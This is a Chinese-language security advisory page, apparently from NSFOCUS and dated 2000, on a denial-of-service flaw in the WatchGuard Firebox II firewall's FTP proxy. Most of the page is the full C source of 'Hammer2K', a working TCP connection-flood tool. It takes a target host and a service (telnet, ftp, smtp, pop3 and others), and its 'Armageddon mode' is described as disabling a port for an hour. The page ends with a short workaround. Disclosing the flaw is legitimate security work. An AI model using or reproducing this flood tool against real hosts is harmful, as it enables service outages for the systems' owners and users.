首页 -> 安全研究
安全研究
安全漏洞
Watchguard Firebox II 拒绝服务漏洞
发布日期:2000-11-21
更新日期:2000-11-21
受影响系统:
描述:
WatchGuard Firebox II
- Linux kernel 2.0
Watchguard Firebox II 是一个流行的基于硬件的防火墙。
Firebox II 中存在一个漏洞,这个漏洞使得远程攻击者对
防火墙的 FTP 代理进行拒绝服务攻击。如果攻击者能连接
FTP 代理,当发起Flood攻击时代理和代理运行的端口将
挂起。并且在这个过程中,还会关掉防火墙上所有其他的服
务。攻击成功时,CPU 的占用率可达 100%,防火墙不得不
重启。
应该注意的是,外部攻击要想成功,FTP 代理必须在非信任
接口上(缺省时 FTP 代理不在非信任端口上)。
<* 来源:Raptor (raptor@0xdeadbeef.eu.org) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/file.h>
#include <sys/types.h>
#include <unistd.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
char *msg = "123456789123456789123456789123456789123456789123456789";
int sock;
int b;
int X;
int p;
int l;
int len;
int a;
int Usage(char *ARG);
int tcp(void);
int armageddon(void);
int all(void);
struct hostent *he;
struct sockaddr_in target;
int main(int argc, char *argv[])
{
if (argc < 4) {
Usage(argv[0]);
}
if ((he=gethostbyname(argv[1])) == NULL) {
printf("\n ERROR: hostname lookup failed \n");
exit(1);
}
if (strcmp(argv[2], "-telnet")==0) {
p = 23;
l = 1800;
} else if (strcmp(argv[2], "-inetd")==0) {
p = 113;
l = 4000;
} else if (strcmp(argv[2], "-pop2")==0) {
p = 109;
l = 3000;
} else if (strcmp(argv[2], "-imap2")==0) {
p = 143;
l = 4000;
} else if (strcmp(argv[2], "-finger")==0) {
p = 79;
l = 1400;
} else if (strcmp(argv[2], "-smtp")==0) {
p = 25;
l = 740;
} else if (strcmp(argv[2], "-ftp")==0) {
p = 21;
l = 800;
} else if (strcmp(argv[2], "-pop3")==0) {
p = 110;
l = 1350;
} else if (strcmp(argv[2], "-netstat")==0) {
p = 15;
l = 1300;
} else {
printf("\n ERROR: Hammer2K doesn't support that service. \n");
}
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("\n ERROR: fatal socket error \n");
exit(1);
}
target.sin_family = AF_INET;
target.sin_port = htons(p);
target.sin_addr = *((struct in_addr *)he->h_addr);
if (connect(sock, (struct sockaddr *)&target, sizeof(target)) == -1) {
printf("\n ERROR: fatal connection error \n");
exit(1);
}
a = atoi(argv[3]);
if (strcmp(argv[3], "-A")==0) {
armageddon();
} else if (strcmp(argv[3], "-NA")==0) {
tcp();
} else {
printf("\n ERROR: please use -A (Armageddon ON)"
" or -NA (Armageddon off)\n");
}
}
int Usage(char *ARG)
{
printf("\n\n Hammer2K by Threx <threx@attrition.org>");
printf("\n Usage: Hammer2K <host> <service> <armageddon-mode>");
printf("\n ::<host>:: ");
printf("\n 0.0.0.0 ");
printf("\n target.net ");
printf("\n\n ::<service>:: ");
printf("\n -netstat ");
printf("\n -ftp ");
printf("\n -telnet ");
printf("\n -smtp ");
printf("\n -finger ");
printf("\n -pop2 ");
printf("\n -imap2 ");
printf("\n -pop3 ");
printf("\n\n ::<armageddon-mode>:: ");
printf("\n -NA = Armageddon Mode Off");
printf("\n -A = Armageddon Mode On\n\n");
exit(1);
}
int armageddon(void)
{
int loop;
int number;
loop = 10;
printf("\n\nHammer2K by Threx <threx@attrition.org>");
printf("\nHomepage http://inferno.tusculum.edu/~threx");
printf("\n Armageddon Mode is [ON] "
"(This will kill a port for one hour)\n");
printf("\n\n Flooding port......\n\n");
for (number = 1; number < loop; number++) {
for (X = 1; X < l; X++) {
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("\n ERROR: fatal socket error \n");
exit(1);
}
target.sin_family = AF_INET;
target.sin_port = htons(p);
target.sin_addr = *((struct in_addr *)he->h_addr);
if (connect(sock, (struct sockaddr *)&target,
sizeof(target)) == -1) {
goto timer;
}
if ((send(sock, msg, len, 0)) == -1) {
printf("\n ERROR: fatal send error \n");
exit(1);
}
len = strlen(msg);
send(sock, msg, len, 0);
close(sock);
}
timer:
system("sleep 600");
}
printf("\n Port %d has been killed for one hour. \n\n", p);
close(sock);
return 0;
}
int tcp(void)
{
printf("\n\nHammer2K by Threx <threx@attrition.org>");
printf("\nHomepage http://inferno.tusculum.edu/~threx");
printf("\n Armageddon Mode is [OFF]]\n");
printf("\n\n Flooding port......\n\n");
for (X = 1; X < l; X++) {
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("\n ERROR: fatal socket error \n");
exit(1);
}
target.sin_family = AF_INET;
target.sin_port = htons(p);
target.sin_addr = *((struct in_addr *)he->h_addr);
if (connect(sock, (struct sockaddr *)&target,
sizeof(target)) == -1) {
printf("\n Port %d: Killed \n", p);
exit(1);
}
if ((send(sock, msg, len, 0)) == -1) {
printf("\n ERROR: fatal send error \n");
exit(1);
}
len = strlen(msg);
send(sock, msg, len, 0);
close(sock);
}
printf("\n Port %d: Port assumed to be open.\n\n", p, l);
close(sock);
return 0;
}
建议:
临时解决办法:
NSFOCUS建议您在没有打上补丁时不要把 FTP 代理放在非信任
接口上。
厂商补丁:
暂无
浏览次数:6600
严重程度:0(网友投票)
绿盟科技给您安全的保障